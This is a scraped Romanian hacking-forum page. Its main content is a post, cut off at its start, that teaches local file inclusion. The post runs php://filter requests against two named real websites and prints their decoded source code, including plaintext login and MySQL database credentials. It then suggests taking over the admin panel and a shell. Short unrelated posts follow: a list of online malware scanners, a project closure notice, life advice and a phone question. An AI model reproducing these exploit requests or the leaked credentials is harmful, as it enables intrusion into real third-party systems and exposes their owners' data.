> 0) { $page="home.php"; }; If ($page) { include($page); } else { include("home.php"); } ?> </td> </tr> </table> </td> </tr> </table> </td> </tr> In sursa vedem instructiunea urmatoare: include('user.php'); Acum vom citi pagina user.phphttp://www.bodyworld-schkeuditz.de/index.php?page=php://filter/convert.base64-encode/resource=user.php Ce am obtinut: PD9waHANCg0KICAkdXNlciA9ICJjYW1pYmIiOw0KICAkcGFzcyA9ICJjYW1pYmIiDQoNCg0K Decodat : $user = "camibb"; $pass = "camibb" Intram in pagina login.php si ne logam cu datele de mai sus (Nu se poate face mare lucru doar pentru concept). Un alt exemplu:Impresariat Alwernia - Andrzej Grabowski Show http://s17.postimg.org/9q9g8rn7z/lfi6.png Vom citi index.php http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://s27.postimg.org/5hgc3dkg3/lfi7.png Ce am obtinut : PGhlYWQ+DQo8VElUTEU+SW1wcmVzYXJpYXQgQWx3ZXJuaWEgLSBBbmRyemVqIEdyYWJvd3NraSBTaG93PC9USVRMRT4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTIiPg0KPE1FVEEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCxmb2xsb3csYWxsIj4NCjxNRVRBIG5hbWU9InJldmlzaXQtYWZ0ZXIiIGNvbnRlbnQ9IjIgZGF5cyI+DQo8TUVUQSBuYW1lPSJ0aXRsZSIgY29udGVudD0iSW1wcmVzYXJpYXQgQWx3ZXJuaWEgLSBBbmRyemVqIEdyYWJvd3NraSBTaG93Ij4NCjxNRVRBIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJHcmFib3dza2ksIEltcHJlc2FyaWF0IEFsd2VybmlhLCBBbmRyemVqIEdyYWJvd3NraSBTaG93LCBBbHdlcm5pYSwgU2NlbmFyaXVzeiBkbGEgMyBha3RvcvN3LCBLd2FydGV0IGRsYSA0IGFrdG9y83csIFNjaGFlZmZlciBCb2d1c7NhdywgQWdlbmNqYSBJbXByZXNhcnlqbmEsIEFnZW5jamEgQXJ0eXN0eWN6bmEsICBBZ2VuY2phIFRlYXRyYWxuby1Lb25jZXJ0b3dhIj48IS0tIEFsd2VybmlhLCBHcmFib3dza2kgLS0+DQo8TUVUQSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQW5kcnplaiBHcmFib3dza2kgU2hvdyAtIEdyYWJvd3NjeS5Db20uIEFnZW5jamEgaW1wcmVzYXJ5am5hIEFsd2VybmlhLiBUeWxrbyBuYWpsZXBzemUgc3Bla3Rha2xlLiBJbXByZXNhcmlhdCBBbHdlcm5pYSAtIEFuZHJ6ZWogR3JhYm93c2tpIFNob3ciPjwhLS0gQWx3ZXJuaWEsIEdyYWJvd3NraSAtLT4NCjxNRVRBIG5hbWU9ImFic3RyYWN0IiBjb250ZW50PSJHcmFib3dza2ksIEltcHJlc2FyaWF0IEFsd2VybmlhLCBBbmRyemVqIEdyYWJvd3NraSBTaG93LCBBbHdlcm5pYSwgU2NlbmFyaXVzeiBkbGEgMyBha3RvcvN3LCBLd2FydGV0IGRsYSA0IGFrdG9y83csIFNjaGFlZmZlciBCb2d1c7NhdywgQWdlbmNqYSBJbXByZXNhcnlqbmEsIEFnZW5jamEgQXJ0eXN0eWN6bmEsICBBZ2VuY2phIFRlYXRyYWxuby1Lb25jZXJ0b3dhIj4NCjxNRVRBIG5hbWU9ImF1dGhvciIgY29udGVudD0iR3JhYm93c2tpLCBJbXByZXNhcmlhdCBBbHdlcm5pYSwgQW5kcnplaiBHcmFib3dza2kgU2hvdywgQWx3ZXJuaWEsIFNjZW5hcml1c3ogZGxhIDMgYWt0b3LzdywgS3dhcnRldCBkbGEgNCBha3RvcvN3LCBTY2hhZWZmZXIgQm9ndXOzYXcsIEFnZW5jamEgSW1wcmVzYXJ5am5hLCBBZ2VuY2phIEFydHlzdHljem5hLCAgQWdlbmNqYSBUZWF0cmFsbm8tS29uY2VydG93YSI+DQo8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LUxhbmd1YWdlIiBDT05URU5UPSJwbCI+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiIHNyYz0ianMvc2tyeXB0LmpzIj48L3NjcmlwdD4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQoNCjwhLS0NCmJvZHkgew0KDQoJYmFja2dyb3VuZC1jb2xvcjogIzM1NUM5MTsNCg0KCW1hcmdpbi1sZWZ0OiAwcHg7DQoNCgltYXJnaW4tdG9wOiAwcHg7DQoNCgltYXJnaW4tcmlnaHQ6IDBweDsNCg0KCW1hcmdpbi1ib3R0b206IDBweDsNCg0KfQ0KDQoNCg0KLS0+DQoNCjwvc3R5bGU+PC9oZWFkPiANCg0KPGJvZHk+DQoNCjx0YWJsZSBjbGFzcz0idGFiZWxhemV3bmV0cnpuYSIgYm9yZGVyPTAgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPiANCg0KPHRyPiANCg0KCTx0ZD4gDQoNCgkJPFRBQkxFIGJvcmRlcj0wIGNsYXNzPSJ0YWJlbGF3ZXduZXRyem5hIiBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTA+IA0KDQoJCTxUUj4gDQoNCgkJCTxURCBjb2xzcGFuPSIzIj48P2luY2x1ZGUoImhlYWRlcl9jZW50ZXIuaHRtIik/PjwvVEQ+IA0KDQoJCTwvVFI+IA0KDQoJCTxUUj4NCg0KCQkgICA8dGQgY2xhc3M9ImxlZnRiYWNrZ3JvdW5kIiB2YWxpZ249InRvcCI+PD9pbmNsdWRlKCJsZWZ0Lmh0bSIpPz48L1REPiANCg0KCQkgICA8dGQgY2xhc3M9ImNlbnRlciIgdmFsaWduPSJ0b3AiPg0KDQogICAgICAgICAgICA8PyANCg0KDQoNCiAgICAgICAgICAgICAgIC8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiAgICAgICAgICAgICAgIHJlcXVpcmVfb25jZSAoImFkbWluL2RhdGFfYmFzZS5jbGFzcyIpOw0KDQogICAgICAgICAgICAgICAkY29ubmlkID0gbmV3IERhdGFCYXNlQ29ubmVjdCgpOw0KDQogICAgICAgICAgICAgICAvLyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQoNCg0KICAgICAgICAgICAgICAgaW5jbHVkZSAoJ25ld3N5L2VuZ2luZS5waHAzJyk7DQoNCg0KDQogICAgICAgICAgICAgICAkcGFnZSAgICA9ICRfR0VUWydwYWdlJ107DQoNCiAgICAgICAgICAgICAgICRzdWJwYWdlID0gJF9HRVRbJ3N1YnBhZ2UnXTsNCg0KICAgICAgICAgICAgICAgJHBhcmVudCAgPSAkX0dFVFsncGFyZW50J107DQoNCiAgICAgICAgICAgICAgICRwaWQgICAgID0gJF9HRVRbJ3BpZCddOw0KDQoNCg0KICAgICAgICAgICAgICAgaWYgKCEkcGFnZSkgDQoNCiAgICAgICAgICAgICAgICAgIGluY2x1ZGUgKCdjZW50ZXIuaHRtJyk7DQoNCiAgICAgICAgICAgICAgIGVsc2UNCg0KICAgICAgICAgICAgICAgaWYgKCRwYWdlID09ICduZXdzeScgJiYgJHN1YnBhZ2UgPT0gJ3Nob3dhbGwnKQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgnbmV3c3kvbmV3c3kucGhwMycpOw0KDQogICAgICAgICAgICAgICBlbHNlDQoNCiAgICAgICAgICAgICAgIGlmICgkcGFnZSA9PSAnbmV3c3knICYmICRzdWJwYWdlID09ICdzaG93JykNCg0KICAgICAgICAgICAgICAgICAgaW5jbHVkZSAoJ25ld3N5L25ld3MucGhwMycpOw0KICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgaWYgKCRwYWdlID09ICdzdHJvbmEnKQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgnbmV3c3kvc3Ryb25hLnBocDMnKTsNCiAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgZWxzZQ0KDQogICAgICAgICAgICAgICAgICBpbmNsdWRlICgkcGFnZSk7DQoNCg0KDQogICAgICAgICAgICA/Pg0KDQogICAgICAgICA8L3RkPg0KDQoJCSAgIDx0ZCBjbGFzcz0icmlnaHRiYWNrZ3JvdW5kIiB2YWxpZ249InRvcCI+PD9pbmNsdWRlKCJuZXdzeS9wb2xlY2FteS5waHAzIik/PjwvVEQ+DQoNCgkJPC9UUj4NCg0KCQk8VFI+DQoNCgkJCTx0ZCBjbGFzcz0iZm9vdGVyYmFja2dyb3VuZGxlZnQiPjw/aW5jbHVkZSgiZm9vdGVyX2xlZnQuaHRtIik/PjwvVEQ+IA0KDQoJCQk8dGQgY2xhc3M9ImZvb3RlcmJhY2tncm91bmQiPjw/aW5jbHVkZSgiZm9vdGVyX2NlbnRlci5odG0iKT8+PC9URD4gDQoNCgkJCTx0ZCBjbGFzcz0iZm9vdGVyYmFja2dyb3VuZHJpZ2h0Ij48P2luY2x1ZGUoImZvb3Rlcl9yaWdodC5odG0iKT8+PC9URD4gDQoNCgkJPC9UUj4NCg0KCQk8L3RhYmxlPg0KDQoJPC90ZD4NCg0KPC90cj4NCg0KPC90YWJsZT4NCg0KPC9ib2R5Pg0KPC9odG1sPg== Decodat: <head> <TITLE>Impresariat Alwernia - Andrzej Grabowski Show</TITLE> <meta http-equiv="content-type" content="text/html; charset=iso-8859-2"> <META name="robots" content="index,follow,all"> <META name="revisit-after" content="2 days"> <META name="title" content="Impresariat Alwernia - Andrzej Grabowski Show"> <META name="keywords" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"><!-- Alwernia, Grabowski --> <META name="description" content="Andrzej Grabowski Show - Grabowscy.Com. Agencja impresaryjna Alwernia. Tylko najlepsze spektakle. Impresariat Alwernia - Andrzej Grabowski Show"><!-- Alwernia, Grabowski --> <META name="abstract" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"> <META name="author" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogus³aw, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"> <META HTTP-EQUIV="Content-Language" CONTENT="pl"> <script language="JavaScript" src="js/skrypt.js"></script> <style type="text/css"> <!-- body { background-color: #355C91; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style></head> <body> <table class="tabelazewnetrzna" border=0 cellpadding=0 cellspacing=0> <tr> <td> <TABLE border=0 class="tabelawewnetrzna" cellpadding=0 cellspacing=0> <TR> <TD colspan="3"><?include("header_center.htm")?></TD> </TR> <TR> <td class="leftbackground" valign="top"><?include("left.htm")?></TD> <td class="center" valign="top"> <? // ----------------------------------------------------------------------------------------------------------------------------------------------------- require_once ("admin/data_base.class"); $connid = new DataBaseConnect(); // ----------------------------------------------------------------------------------------------------------------------------------------------------- include ('newsy/engine.php3'); $page = $_GET['page']; $subpage = $_GET['subpage']; $parent = $_GET['parent']; $pid = $_GET['pid']; if (!$page) include ('center.htm'); else if ($page == 'newsy' && $subpage == 'showall') include ('newsy/newsy.php3'); else if ($page == 'newsy' && $subpage == 'show') include ('newsy/news.php3'); else if ($page == 'strona') include ('newsy/strona.php3'); else include ($page); ?> </td> <td class="rightbackground" valign="top"><?include("newsy/polecamy.php3")?></TD> </TR> <TR> <td class="footerbackgroundleft"><?include("footer_left.htm")?></TD> <td class="footerbackground"><?include("footer_center.htm")?></TD> <td class="footerbackgroundright"><?include("footer_right.htm")?></TD> </TR> </table> </td> </tr> </table> </body> </html> Ce este interesant in pagina sursa este admin/data_base.class si ii vom citi sursa http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=admin/data_base.class De acolo am obtinut : PD8NCmNsYXNzIERhdGFCYXNlQ29ubmVjdA0Kew0KICAgdmFyICRteXNxbGlkY29ubjsNCiAgIHZhciAkZGF0YWJhc2VuYW1lOw0KICAgdmFyICRyZXN1bHRzOw0KICAgdmFyICR0YWJsZW5hbWU7DQoNCiAgIGZ1bmN0aW9uIERhdGFCYXNlQ29ubmVjdCgpDQogICB7DQovLyAgICAgICRteXNxbF9ob3N0ID0gImxvY2FsaG9zdCI7DQovLyAgICAgICRteXNxbF91c2VyID0gInJvb3QiOw0KLy8gICAgICAkbXlzcWxfcGFzcyA9ICIiOw0KDQogICAgICAkbXlzcWxfaG9zdCA9ICJsb2NhbGhvc3QiOw0KICAgICAgJG15c3FsX3VzZXIgPSAiZ3JhYm93c2N5IjsNCiAgICAgICRteXNxbF9wYXNzID0gInFISW5KaTRvIjsNCg0KICAgICAgJG15c3FsX2RiX25hbWUgPSAiZ3JhYm93c2N5IjsNCiAgICAgICRuYXp3YV90YWJlbGkgPSAgImdyYWJvd3NjeV8iOw0KDQogICAgICAkaWRfY29ubiA9IEBteXNxbF9jb25uZWN0KCRteXNxbF9ob3N0LCRteXNxbF91c2VyLCRteXNxbF9wYXNzKSBvcg0KICAgICAgICAgZGllKCc8c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFZlcmRhbmE7IGZvbnQtc2l6ZTogMTNweCI+PGI+UHJvYmxlbSB6IGRvc3TqcGVtIGRvIHNlcndlcmEgYmF6eSBkYW55Y2g8L2I+Jyk7DQogICAgICBAbXlzcWxfc2VsZWN0X2RiKCRteXNxbF9kYl9uYW1lKSBvcg0KICAgICAgICAgZGllKCc8c3BhbiBzdHlsZT0iZm9udC1mYW1pbHk6IFZlcmRhbmE7IGZvbnQtc2l6ZTogMTNweCI+PGI+UHJvYmxlbSB6IGRvc3TqcGVtIGRvIGJhenkgZGFueWNoLjwvYj4nKTsNCg0KICAgICAgJHRoaXMgLT4gbXlzcWxpZGNvbm4gPSAkaWRfY29ubjsNCiAgICAgICR0aGlzIC0+IGRhdGFiYXNlbmFtZSA9ICRteXNxbF9kYl9uYW1lOw0KICAgICAgJHRoaXMgLT4gdGFibGVuYW1lID0gJG5hendhX3RhYmVsaTsNCiAgIH0NCg0KICAgZnVuY3Rpb24gQ2hlY2tUYWJsZUV4aXN0cygkdGFibGUpDQogICB7DQogICAgICAgJHRoaXMtPnJlc3VsdHMgPSBteXNxbF9kYl9xdWVyeSgkdGhpcy0+ZGF0YWJhc2VuYW1lLCAiU0VMRUNUIDEgRlJPTSBgJHRhYmxlYCBMSU1JVCAwIiwgJHRoaXMtPm15c3FsaWRjb25uKTsNCiAgICAgICByZXR1cm4gJHRoaXMtPnJlc3VsdHM7DQogICB9DQoNCiAgIGZ1bmN0aW9uIFF1ZXJ5VG9EYXRhQmFzZSgkcXVlcnkpDQogICB7DQogICAgICAgJHRoaXMtPnJlc3VsdHMgPSBteXNxbF9xdWVyeSgkcXVlcnkpIG9yDQogICAgICAgICAgZGllKCJQcm9ibGVtIHogZG9zdOpwZW0gZG8gYmF6eSBkYW55Y2guICIuJHF1ZXJ5KTsNCiAgICAgICByZXR1cm4gJHRoaXMtPnJlc3VsdHM7DQogICB9DQoNCn0NCj8+DQo= Decodat: <? class DataBaseConnect { var $mysqlidconn; var $databasename; var $results; var $tablename; function DataBaseConnect() { // $mysql_host = "localhost"; // $mysql_user = "root"; // $mysql_pass = ""; $mysql_host = "localhost"; $mysql_user = "grabowscy"; $mysql_pass = "qHInJi4o"; $mysql_db_name = "grabowscy"; $nazwa_tabeli = "grabowscy_"; $id_conn = @Mysql_select_db($mysql_db_name) or die('<span style="font-family: Verdana; font-size: 13px"><b>Problem z dostêpem do bazy danych.</b>'); $this -> mysqlidconn = $id_conn; $this -> databasename = $mysql_db_name; $this -> tablename = $nazwa_tabeli; } function CheckTableExists($table) { $this->results = mysql_db_query($this->databasename, "SELECT 1 FROM `$table` LIMIT 0", $this->mysqlidconn); return $this->results; } function QueryToDataBase($query) { $this->results = mysql_query($query) or die("Problem z dostêpem do bazy danych. ".$query); return $this->results; } } ?> si voala : $mysql_user = "grabowscy"; $mysql_pass = "qHInJi4o"; $mysql_db_name = "grabowscy"; De aici puteti obtine acces la baza de date ,sa luam acces la panou de adminitrare si shell:D. Aceste exemple au fost date doar pentru a demonstra impactul vurnarabilitati. Cam atat am avut de spus sper sa va fi fost de folos tutorialul. O zi buna:D.
    1 point
  2. sharku
    Am decis sa postez aici o lista cu mai multe siteuri de analizat malware , url si antivirusi online. Sper sa va fie de folos:) Malware Scan http://www.virustotal.com/ [File and Website] Jotti's malware scan Anubis: Analyzing Unknown Binaries VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 37 AntiVirus Engines! ThreatExpert - Online File Scanner Public Sandbox - Submit a Sample for Malware Analysis Eureka Malware Analysis Page Wepawet - Home [File and Website] https://www.metascan-online.com/ Xandora - Your Online Binary Analyser Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org [File and Website] Irish Cream Service - Free Antivirus Scan Service [File and Website] ScanThis! Free online virus scanner [File and Website] Zscaler Zulu URL Risk Analyzer - Zulu Website Scan Automated Exploit Analysis Online Virus Scanner - Scan Links for Malware, Trojans and Viruses Sucuri SiteCheck - Free Website Malware Scanner Online Webpage Scanning for Malware Attacks | Web Inspector Online Scan urlquery.net - Free URL scanner Servicio de seguridad web, desenmascarame Scan websites for exploits, malware and other malicious threats using multiple web reputation engines and domain blacklists jsunpack - a generic JavaScript unpacker [Website, Javascript, PDF, HTML and pcap] Website/URL/Link Scanner Safety Check for Phishing, Malware, Viruses - ScanURL.net AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera Dr.Web online scanners https://www.trustedsource.org/?p=mcafee UrlScan 3.1 : The Official Microsoft IIS Site UnThreat Online Scanner Antivirus Online http://quickscan.bitdefender.com/ro/ Free Online Virus Scan - Bitdefender Online Virus Scanner ESET Free Online Scanner :: Complete Malware Detection :: ESET Emsisoft Web Malware Scan | Dual-Engine Browser Scanner - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits Free Online Virus Scan - Antivirus Software - Trend Micro USA Panda Activescan | Free Online Antivirus | Free Virus Disinfection - Panda Security https://www.grc.com/x/ne.dll?bh0bkyd2 :: WindowSecurity.com How To - Remove threats - Removal Tools | F-Secure Rising Online Virus Scanner FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY https://security.symantec.com/sscv6/GetBrowser.asp?pkj=QTHYGXMQPHPUCCBMMHL&langid=ie&venid=sym&plfid=00&from=/sscv6/home.asp PC Flank: Make sure you're protected on all sides. Sursa: cleanbytes.net/malware-online-scanners
    0 points
  3. M2G
    Consider ca programul nu se ridica asteptarilor mele, ca este deprecated, ca nu are un design destul de bun si ca se poate mai bine. Pana cand o sa am timp sa fac o alta versiune, proiectul acesta e abandonat complet. Intr-o versiune viitoare, daca o sa fie una, o sa fie totul rescris de la 0 intr-un stil mai profesionist. Closed!
    -1 points
  4. Sithalkes
    1. C?m?tarie 2. Fa niste cursuri, ceva ce sa te ajute sa-ti gasesti un job bun, sau intr-o posibila viitoare afacere. 3. Du-te sa vezi lumea, excursii, etc. Ps: astea presupunand ca ai deja minimum necesar de confort, dantura in stare buna, conditii civilizate de locuit, un pc/laptop, decent.
    -1 points
  5. unic
    Incercati si voi sa dati un bip sau sa sunati la nr asta 07 sa vedeti ca primiti niste mesaje zilnic si cand il sunati raspunde si zice doar "alo alo nu va aud" repeta cuvintele astea pana te saturi sa il asculti si ii inchizi telefonu Ce poate fi?? mesageriea vocala nu cred
    -1 points
×
×
  • Create New...